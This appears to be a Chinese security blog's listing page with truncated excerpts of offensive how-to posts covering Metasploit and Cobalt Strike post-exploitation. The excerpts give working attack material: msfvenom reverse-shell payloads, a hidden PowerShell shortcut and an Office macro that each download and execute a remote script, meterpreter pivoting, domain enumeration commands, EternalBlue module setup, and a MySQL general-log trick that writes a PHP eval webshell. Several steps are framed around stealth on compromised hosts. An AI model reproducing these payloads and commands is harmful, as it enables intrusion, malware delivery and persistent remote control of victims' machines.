把MSF shell派生给Cobaltstrike3.6过程

原因:MSF带着走哪都比较繁重,无法集群工作,然鹅,解决这个问题的时候,发现msf上已经有meterpreter几十个,想要转走到集群的Cobaltstike上,只需要以下几步即可完成,Cobaltstrike 3.0+以后的集群是否方便,谁用谁知道。 1.登陆集群的Cobaltstirke,然后设置个beacon_http的监听。(至于为什么这个方式监听,隐蔽,要不然你监听后,到肉鸡上执行netstat -ano 看看) 2.进入有多个 meterpreter sessions的msf执行: use exploit/windows/local/payload_inject                    启用攻击模块中windows分类下local分类的payload_inject 攻击器// set PAYLOAD windows/meterpreter/reverse_http […]

查看全部


MSF之目标内网代理

利用场景:有时候使用msf拿到meterpreter 反弹了,但是想把机器代理到对方的内网里,任何请求也走对方的内网。此刻需要使用到msf的辅助模块 socks4a(msf也有类似lcx功能模块,名字portfwd ) pivot是meterpreter最常用的一种代理,可以轻松把你的机器代理到受害者内网环境,下面介绍下pivot的搭建和使用方法 使用方法route add   目标i或ip段     Netmask 要使用代理的会话,通过实例来说明: 在metasploit添加一个路由表,目的是访问10.1.1.129将通过meterpreter的会话 1 来访问: msf exploit(handler) > route add xxx.xxx.xxx.xxx 255.255.255.0 1 [*] Route added msf exploit(handler) > ro […]

查看全部


快捷方式powershell反弹到msf

生成一个msf后门 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 -f psh-reflection > psl.psl   在windows下创建一个快捷方式: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -c “IEX (New-Object Net.WebClient).DownloadString(‘http://xxx.com/psl.psl’);”   or msfvenom -p windows/x64/meterpreter/re […]

查看全部


内网(域)渗透基本命令

内网(域)渗透–基本命令 ———————————————————————————————————— ipconfig /all —— 查询本机IP段,所在域等 net user —— 本机用户列表 net localhroup administrators —— 本机管理员[通常含有域用户] net user /domain —— 查询域用户 net group /domain —— 查询域里面的工作组 net group “domain admins” /domain —— 查询域管理员用户组 net localgroup administrators /domain —— 登录本机的域管理员 net localgroup administrators workgroup\user001 /add ——域用户添加到本机 ne […]

查看全部


445端口之Metasploit集成使用

前言:445对坏人而言是个好端口,对好人而言是个坏端口。(小孩子才分好坏么?我想也是) 使用环境:woobuntu(乌云版ubuntu),自带了MSF,不是最新版就sudo msfupdate吧升级一下。 下载msf关于445的漏洞模块: git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git 这里需要说明一下,MSF所有模块都是在相应文件夹里的,所以,可以把clone下来的直接复制到的 /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.14.1/modules/exploits/windows/smb/ 这个目录下,也就是最新的445漏洞到smb目录下。 然后就是vi 修改目录下 […]

查看全部


通过Office宏植入恶意软件

举例: 使用msf 生成反弹shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.130 LPORT=443 -f psh-reflection > /var/www/html/shellcode.ps1 在office宏中插入: Sub Execute() Dim payload payload = “powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString(‘http://10.1.1.130/shellcode.ps1’));” Call Shell(payload, vbHide) End Sub Sub A […]

查看全部


Mysql无outfile权限时写shell方法

outfile被禁止,或者写入文件被拦截,root权限,在数据库中操作如下:   show variables like ‘%general%’;         // 查看mysql日志路径 set global general_log=on;                  //开启日志 set global general_log_file=’xxx路径/1.php’;     //设置目录日志为shell地址 select ‘<?php eval($_POST[cmd]);?>’           //随意执行一条mysql语句让其写入一句话到1.php文件里 —- End

查看全部